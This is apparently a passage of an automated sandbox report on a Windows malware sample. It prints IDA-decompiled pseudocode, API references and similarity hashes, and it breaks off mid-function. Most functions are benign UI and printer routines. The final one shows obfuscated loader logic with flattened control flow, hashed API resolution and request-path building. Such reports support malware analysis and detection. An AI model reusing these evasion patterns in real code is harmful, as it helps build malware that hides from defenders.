							asm("cdq");
							asm("cdq");
							_push((_v20.bottom - _v20.top - _t130 >> 1) + _v20.top);
							_push((_v20.right - _v20.left - _t130 >> 1) + _v20.left);
							asm("movsd");
							asm("movsd");
							_push(_a4);
							asm("movsd");
							asm("movsd");
							E0041DD44(_t109);
							_t134 = _a4;
						}
						_push(0x114);
						_push(_v20.bottom - _v20.top);
						_push(_v20.right - _v20.left);
						_push(_v20.top);
						_push(_v20.left);
						_push(0);
					}
					E0041663D(_t134);
					if(E00413740(_t136, GetParent( *(_t134 + 0x1c))) != _t109) {
						if(_t109 != 0) {
							_t81 =  *(_t109 + 0x1c);
						} else {
							_t81 = 0;
						}
						E00413740(_t136, SetParent( *(_t134 + 0x1c), _t81));
					}
					_t120 =  *((intOrPtr*)(_t134 + 0x70));
					_t153 =  *((intOrPtr*)(_t134 + 0x70));
					if( *((intOrPtr*)(_t134 + 0x70)) != 0) {
						E0041D609(_t120, _t153, _t134, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t134 + 0x70)) = _t109;
					_t79 = E004225AA(_t109, _t153);
					 *(_t79 + 0xb8) =  *(_t79 + 0xb8) | 0x0000000c;
					return _t79;
				}
				if(_a8 != 0) {
					_t61 = EqualRect( &_v36, _a8);
					if(_t61 == 0) {
						goto L3;
					}
				}
				return _t61;
			}

0x0041d3c1
0x0041d3cc
0x0041d3d7
0x0041d3d9
0x0041d3e2
0x0041d403
0x0041d407
0x0041d40f
0x0041d40f
0x0041d413
0x0041d420
0x0041d424
0x0041d427
0x0041d437
0x0041d446
0x0041d446
0x0041d45a
0x0041d461
0x0041d467
0x0041d467
0x0041d463
0x0041d463
0x0041d463
0x0041d46c
0x0041d487
0x0041d48b
0x0041d493
0x0041d493
0x0041d49a
0x0041d50f
0x0041d512
0x0041d514
0x0041d51d
0x0041d529
0x0041d529
0x0041d52e
0x0041d534
0x0041d536
0x0041d53b
0x0041d53e
0x0041d53f
0x0041d540
0x0041d548
0x0041d549
0x0041d49c
0x0041d4a3
0x0041d4af
0x0041d4b7
0x0041d4c2
0x0041d4d2
0x0041d4da
0x0041d4db
0x0041d4e3
0x0041d4e4
0x0041d4e5
0x0041d4e8
0x0041d4e9
0x0041d4ea
0x0041d4ef
0x0041d4ef
0x0041d4f5
0x0041d4fd
0x0041d504
0x0041d505
0x0041d508
0x0041d50b
0x0041d50b
0x0041d54c
0x0041d562
0x0041d566
0x0041d56c
0x0041d568
0x0041d568
0x0041d568
0x0041d57a
0x0041d57a
0x0041d57f
0x0041d582
0x0041d584
0x0041d58b
0x0041d58b
0x0041d592
0x0041d595
0x0041d59a
0x00000000
0x0041d59a
0x0041d3e8
0x0041d3f5
0x0041d3fd
0x00000000
0x00000000
0x0041d3fd
0x0041d5a5

APIs

GetWindowRect.USER32 ref: 0041D3D9
EqualRect.USER32 ref: 0041D3F5
GetDlgCtrlID.USER32 ref: 0041D476
CopyRect.USER32 ref: 0041D4A3
GetParent.USER32(?), ref: 0041D554
SetParent.USER32(?,?,00000000), ref: 0041D573

Strings

@, xrefs: 0041D40F

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Parent$CopyCtrlEqualWindow
String ID: @
API String ID: 3581194824-2766056989
Opcode ID: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
Instruction ID: 8366d14a4fbab590a3c5e893c5bf745e495171ad1a8ef82a64abe53d0d133945
Opcode Fuzzy Hash: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
Instruction Fuzzy Hash: 88518FB1A00615ABDF14DF69CC85AEE77AAEB44308F00452AE912D72A1DB38E985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00409509, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409509() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x439ed4; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00405667(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00405700(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00405667(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E004062E0(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x439ed4 = 2;
					goto L18;
				}
				 *0x439ed4 = 1;
				goto L6;
			}

0x0040950b
0x0040951a
0x0040951c
0x0040951e
0x00409522
0x0040955a
0x004095e4
0x00409632
0x00000000
0x00409632
0x004095e6
0x004095e8
0x004095f6
0x004095f8
0x004095fa
0x00409606
0x00409609
0x00409611
0x00409616
0x0040961f
0x00409618
0x00409618
0x00409618
0x00409628
0x00000000
0x00000000
0x00000000
0x00000000
0x004095fc
0x004095fc
0x004095fc
0x004095fc
0x004095fd
0x00409601
0x00409602
0x00000000
0x004095fc
0x004095f0
0x004095f4
0x00000000
0x00000000
0x00000000
0x004095f4
0x00409560
0x00409562
0x00409570
0x00409573
0x00409575
0x00409585
0x00409591
0x00409598
0x0040959e
0x004095a2
0x004095a5
0x004095ad
0x004095b1
0x004095c2
0x004095c8
0x004095ce
0x004095ce
0x004095d2
0x004095d2
0x004095b1
0x004095d7
0x00000000
0x00000000
0x00000000
0x00000000
0x00409577
0x00409577
0x00409577
0x00409578
0x00409579
0x0040957f
0x00409580
0x00000000
0x00409577
0x00409566
0x0040956a
0x00000000
0x00000000
0x00000000
0x0040956a
0x00409526
0x0040952a
0x0040953e
0x00409542
0x00000000
0x00000000
0x00409548
0x00000000
0x00409548
0x0040952c
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409524
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409538
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409564
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 0040959C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 004095BE
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040641E), ref: 004095D7
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 004095EA
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00409628

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
Instruction ID: ef1768683ce44c7a55569678311ee6e18f6548819425519884899f5cccb4810e
Opcode Fuzzy Hash: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
Instruction Fuzzy Hash: 023142B35052147FD7313F765C9483BB79CE649358B59093BF482E32C2EA3A8C4286AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041518D, Relevance: 12.1, APIs: 8, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041518D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				int _t56;
				intOrPtr* _t57;
				signed short _t62;
				void* _t63;
				void* _t67;
				intOrPtr* _t80;
				signed int _t83;
				struct HWND__* _t86;
				void* _t87;

				_t67 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a16 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t56 = GetTopWindow( *(_t67 + 0x1c));
				_t86 = _t56;
				while(_t86 != 0) {
					_t62 = GetDlgCtrlID(_t86);
					_push(_t86);
					_t83 = _t62 & 0x0000ffff;
					_t63 = E00413767();
					if(_t83 != _a12) {
						if(_t83 >= _a4 && _t83 <= _a8 && _t63 != 0) {
							SendMessageA(_t86, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t86;
					}
					_t56 = GetWindow(_t86, 2);
					_t86 = _t56;
				}
				if(_a16 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t57 = E00413740(_t87, _v8);
						if(_a16 == 2) {
							_t80 = _a20;
							_v36.left = _v36.left +  *_t80;
							_v36.top = _v36.top +  *((intOrPtr*)(_t80 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t80 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t80 + 0xc));
						}
						 *((intOrPtr*)( *_t57 + 0x60))( &_v36, 0);
						_t56 = E004152C7( &_v40, _v8,  &_v36);
					}
					if(_v40 != 0) {
						_t56 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t56 = _a20;
						 *((intOrPtr*)(_t56 + 8)) = _v20;
						 *((intOrPtr*)(_t56 + 4)) = 0;
						 *_t56 = 0;
						 *((intOrPtr*)(_t56 + 0xc)) = _v16;
					} else {
						_t56 = CopyRect(_a20,  &_v36);
					}
				}
				return _t56;
			}

0x00415198
0x004151a2
0x004151a5
0x004151a8
0x004151ab
0x004151ae
0x004151c0
0x004151b0
0x004151b3
0x004151b4
0x004151b5
0x004151b6
0x004151b6
0x004151ca
0x004151d9
0x004151cc
0x004151d4
0x004151d4
0x004151e0
0x004151e6
0x004151ea
0x004151ef
0x004151f5
0x004151f6
0x004151f9
0x00415201
0x0041520b
0x00415221
0x00415221
0x00415203
0x00415203
0x00415203
0x0041522a
0x00415230
0x00415230
0x00415238
0x00415267
0x00415271
0x0041527a
0x0041527c
0x00415281
0x00415287
0x0041528d
0x00415293
0x00415293
0x0041529f
0x004152ad
0x004152ad
0x004152b5
0x004152ba
0x004152ba
0x0041523a
0x0041523d
0x0041524e
0x00415254
0x0041525a
0x0041525d
0x0041525f
0x0041523f
0x00415246
0x00415246
0x0041523d
0x004152c4

APIs

GetClientRect.USER32 ref: 004151C0
BeginDeferWindowPos.USER32 ref: 004151CE
GetTopWindow.USER32(?), ref: 004151E0
GetDlgCtrlID.USER32 ref: 004151EF
SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 00415221
GetWindow.USER32(00000000,00000002), ref: 0041522A
CopyRect.USER32 ref: 00415246

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
String ID:
API String ID: 3332788312-0
Opcode ID: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
Instruction ID: 90a1176f2728ed92b7e018f664d1b63403b8a41a4a5cc89754fcf96d7c9d9e63
Opcode Fuzzy Hash: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
Instruction Fuzzy Hash: D8418D72D00609EFCF15DF94D8848EEB7B5FF49304B1480AAE901A7251C738AE81CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041264E, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041264E(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x98);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x94);
							if( *(_t35 + 0x94) != 0) {
								E0041A92B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x94) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0041A92B( *(_t35 + 0x94));
								 *(_t35 + 0x94) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x00412651
0x00412654
0x00412659
0x00412661
0x0041267a
0x00412682
0x0041268c
0x00412693
0x00412695
0x0041269d
0x004126a0
0x004126a0
0x004126b7
0x004126be
0x004126d9
0x004126e1
0x004126e6
0x004126e6
0x004126ef
0x004126ef
0x00412693
0x00412682
0x004126f8

APIs

GlobalLock.KERNEL32 ref: 0041266E
lstrcmpA.KERNEL32(?,?), ref: 0041267A
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041268C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126AF
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126B7
GlobalLock.KERNEL32 ref: 004126C4
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004126D1
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004126EF

Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
Instruction ID: e892e9459afc7c616b27fd268aebf896f546ff29830f707e5cbc297c1b476139
Opcode Fuzzy Hash: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
Instruction Fuzzy Hash: 4011E771200104BEDB21AB76CD4AEAF7BBDEF85704F00042EF608D1152D7799DA1D728

Uniqueness

Uniqueness Score: -1.00%

Function 0042322D, Relevance: 12.1, APIs: 8, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042322D(intOrPtr __ecx) {
				int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _t24;
				intOrPtr _t26;
				int _t35;
				long _t39;
				intOrPtr _t40;
				int _t42;
				void* _t43;

				_v12 = __ecx;
				_v8 = GetSystemMetrics(6);
				_t39 = GetSystemMetrics(5);
				_t35 = GetSystemMetrics(0x21);
				_t42 = GetSystemMetrics(0x20);
				_v28.top = _v8;
				_t24 =  *0x439c98; // 0x0
				_v28.left = _t39;
				_v28.right = _t24 - _t39;
				_t26 =  *0x439c9c; // 0x0
				_v28.bottom = _t26;
				if((E00416528(_v12) & 0x00040600) != 0) {
					OffsetRect( &_v28, _t42 - _t39, _t35 - _v8);
				}
				_t40 = _v12;
				_push(GetWindowDC( *(_t40 + 0x1c)));
				_t43 = E00419BA2();
				InvertRect( *(_t43 + 4),  &_v28);
				return ReleaseDC( *(_t40 + 0x1c),  *(_t43 + 4));
			}

0x0042323c
0x00423245
0x0042324c
0x00423252
0x00423256
0x0042325e
0x00423261
0x00423266
0x0042326b
0x0042326e
0x00423273
0x00423280
0x0042328d
0x0042328d
0x00423293
0x0042329f
0x004232a5
0x004232ae
0x004232c4

APIs

GetSystemMetrics.USER32 ref: 00423241
GetSystemMetrics.USER32 ref: 00423248
GetSystemMetrics.USER32 ref: 0042324E
GetSystemMetrics.USER32 ref: 00423254

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

OffsetRect.USER32(?,00000000,?), ref: 0042328D
GetWindowDC.USER32(?,?,?,?), ref: 00423299
InvertRect.USER32(?,?), ref: 004232AE
ReleaseDC.USER32 ref: 004232BA

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$RectWindow$InvertLongOffsetRelease
String ID:
API String ID: 2500086165-0
Opcode ID: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
Instruction ID: 7c5e0aa81d449cf31b82ccaaec63d8c78fb3c057318de3585a12a8b43351a0d8
Opcode Fuzzy Hash: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
Instruction Fuzzy Hash: 4A112B72E00218ABCB10DFF9ED4999EBFB8EF44350F104166EA05E3250D775AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 022312B0, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E022312B0(char __ecx, signed int __edx, intOrPtr* _a4) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr* _v2820;
				intOrPtr* _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				signed int _v2848;
				intOrPtr _v2852;
				void* _v2856;
				intOrPtr* _v2860;
				char _v2864;
				intOrPtr _v2868;
				char _v2872;
				intOrPtr* _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				char _v2892;
				intOrPtr* _v2896;
				intOrPtr _v2904;
				intOrPtr* _v2908;
				void* __ebx;
				void* __ebp;
				void* _t117;
				signed int _t118;
				void* _t121;
				intOrPtr* _t139;
				intOrPtr* _t141;
				signed int _t146;
				signed int _t154;
				intOrPtr* _t157;
				intOrPtr* _t159;
				signed int _t163;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t178;
				intOrPtr* _t182;
				void* _t189;
				intOrPtr* _t191;
				intOrPtr* _t194;
				intOrPtr* _t196;
				char _t241;
				signed char* _t243;
				signed int _t263;
				short* _t265;
				void* _t266;
				short* _t267;
				void* _t268;
				void* _t269;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr* _t274;
				void* _t276;
				void* _t277;
				intOrPtr* _t278;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				_t280 =  &_v2896;
				_t278 = _v2864;
				_t263 = __edx;
				_v2888 = 0;
				_t241 = __ecx;
				_v2884 = __edx;
				_t196 = _v2860;
				_t117 = 0xa52ba2c;
				_v2892 = __ecx;
				_v2896 = _t196;
				_v2876 = _t278;
				while(1) {
					L1:
					_t191 = _a4;
					goto L2;
					do {
						while(1) {
							L2:
							_t282 = _t117 - 0x1a712fee;
							if(_t282 > 0) {
								break;
							}
							if(_t282 == 0) {
								_t157 =  *0x223dea8;
								__eflags = _t157;
								if(_t157 == 0) {
									_t157 = E02233E80(_t191, E02233F20(0xbb398380), 0x97f883e, _t278);
									 *0x223dea8 = _t157;
								}
								_t268 =  *_t157();
								_t159 =  *0x223e1a0;
								__eflags = _t159;
								if(_t159 == 0) {
									_t159 = E02233E80(_t191, E02233F20(0xbb398380), 0x26c3f343, _t278);
									 *0x223e1a0 = _t159;
								}
								 *_t159(_t268, 0, _v2844);
								_t196 = _v2908;
								_t117 = 0xa9569d6;
								_t241 = _v2904;
								continue;
							} else {
								_t283 = _t117 - 0xa52ba2c;
								if(_t283 > 0) {
									__eflags = _t117 - 0x1194a5ec;
									if(__eflags > 0) {
										__eflags = _t117 - 0x1947423a;
										if(_t117 != 0x1947423a) {
											goto L28;
										} else {
											_t163 = E02231FB0( &_v2872,  &_v2856);
											_t196 = _v2896;
											_t241 = _v2892;
											asm("sbb eax, eax");
											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
											continue;
										}
									} else {
										if(__eflags == 0) {
											_t265 =  &_v2560;
											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
											__eflags = _t194;
											if(_t194 != 0) {
												do {
													_t273 = (_v2880 & 0x0000000f) + 4;
													E02234ED0(_t265, _t273,  &_v2880);
													_t267 = _t265 + _t273 * 2;
													_t280 = _t280 + 4;
													 *_t267 = 0x2f;
													_t265 = _t267 + 2;
													_t194 = _t194 - 1;
													__eflags = _t194;
												} while (_t194 != 0);
												_t278 = _v2876;
												_t196 = _v2896;
											}
											_t241 = _v2892;
											 *_t265 = 0;
											_t117 = 0x26613761;
											_t263 = _v2884;
											goto L1;
										} else {
											__eflags = _t117 - 0xa9569d6;
											if(_t117 == 0xa9569d6) {
												E02234250(_t191, _v2864);
												_t196 = _v2896;
												_t117 = 0xc5127ed;
												_t241 = _v2892;
												continue;
											} else {
												__eflags = _t117 - 0xc5127ed;
												if(_t117 == 0xc5127ed) {
													L69:
													E02234250(_t191, _t278);
													L70:
													return _v2888;
												} else {
													goto L28;
												}
											}
										}
									}
								} else {
									if(_t283 == 0) {
										_t174 =  *0x223dd4c;
										__eflags = _t174;
										if(_t174 == 0) {
											_t174 = E02233E80(_t191, E02233F20(0xbb398380), 0xae3c1a47, _t278);
											 *0x223dd4c = _t174;
										}
										_t175 =  *_t174();
										_t196 = _v2896;
										_t241 = _v2892;
										_v2880 = _t175;
										_t117 = 0x38f41d46;
										continue;
									} else {
										_t284 = _t117 - 0x3354cb2;
										if(_t284 > 0) {
											__eflags = _t117 - 0x8f8b881;
											if(_t117 != 0x8f8b881) {
												goto L28;
											} else {
												_t178 = E02231950( &_v2844,  &_v2688,  &_v2836);
												_t196 = _v2896;
												_t280 = _t280 + 4;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
												continue;
											}
										} else {
											if(_t284 == 0) {
												_t269 = E022334C0(0x223d0e0);
												_t182 =  *0x223dc60;
												__eflags = _t182;
												if(_t182 == 0) {
													_t182 = E02233E80(_t191, E02233F20(0xe66945e6), 0xcca28b0d, _t278);
													 *0x223dc60 = _t182;
												}
												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
												_t280 = _t280 + 0x14;
												E02233460(_t269);
												_t196 = _v2896;
												_t117 = 0x8f8b881;
												_t241 = _v2892;
												continue;
											} else {
												if(_t117 == 0xe50069) {
													E02234250(_t191, _v2856);
													_t196 = _v2896;
													_t117 = 0x2ec7d52f;
													_t241 = _v2892;
													continue;
												} else {
													if(_t117 != 0x26c79c2) {
														goto L28;
													} else {
														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
														_t270 = E022342F0(_t191,  *_v2856);
														 *_t191 = _t270;
														if(_t270 != 0) {
															_push( *((intOrPtr*)(_t191 + 4)));
															_push(_t270);
															_t189 = E022357E0(_v2852 - 4);
															_t280 = _t280 + 8;
															asm("sbb edi, edi");
															_v2888 =  ~_t263;
															if(0 == _t189) {
																E02234250(_t191,  *_t191);
															}
															_t263 = _v2884;
														}
														_t196 = _v2896;
														_t117 = 0xe50069;
														_t241 = _v2892;
														continue;
													}
												}
											}
										}
									}
								}
							}
							L71:
						}
						__eflags = _t117 - 0x2ec7d52f;
						if(__eflags > 0) {
							__eflags = _t117 - 0x310afd51;
							if(_t117 == 0x310afd51) {
								_v2828 = _t241;
								_v2820 = _t196;
								_v2824 = _t278;
								_t118 = E02231E60( &_v2828,  &_v2864);
								_t196 = _v2896;
								_t241 = _v2892;
								asm("sbb eax, eax");
								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
								goto L2;
							} else {
								__eflags = _t117 - 0x3380dca7;
								if(_t117 == 0x3380dca7) {
									_t121 = E022334C0(0x223d080);
									_t274 =  *0x223dc60;
									_t266 = _t121;
									__eflags = _t274;
									if(_t274 == 0) {
										_t274 = E02233E80(_t191, E02233F20(0xe66945e6), 0xcca28b0d, _t278);
										 *0x223dc60 = _t274;
									}
									_t243 =  *( *0x223e2e0 + 0xc);
									 *_t274( &_v2816, 0x40, _t266, _t243[3] & 0x000000ff, _t243[2] & 0x000000ff, _t243[1] & 0x000000ff,  *_t243 & 0x000000ff);
									_t280 = _t280 + 0x1c;
									E02233460(_t266);
									_t196 = _v2896;
									_t263 = _v2884;
									_t241 = _v2892;
									_v2848 = ( *( *0x223e2e0 + 0xc))[4] & 0x0000ffff;
									_t117 = 0x1194a5ec;
									goto L2;
								} else {
									__eflags = _t117 - 0x38f41d46;
									if(_t117 != 0x38f41d46) {
										goto L28;
									} else {
										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
										_t278 = E022342F0(_t191, _t276);
										_v2876 = _t278;
										__eflags = _t278;
										if(_t278 == 0) {
											goto L70;
										} else {
											_push(_t276);
											_push(_t278);
											_t196 = E02235BC0( *_t263,  *(_t263 + 4), _t278);
											_t280 = _t280 + 8;
											_v2896 = _t196;
											__eflags = _t196;
											if(_t196 == 0) {
												goto L69;
											} else {
												_t241 = _v2892;
												_t117 = 0x310afd51;
												goto L2;
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
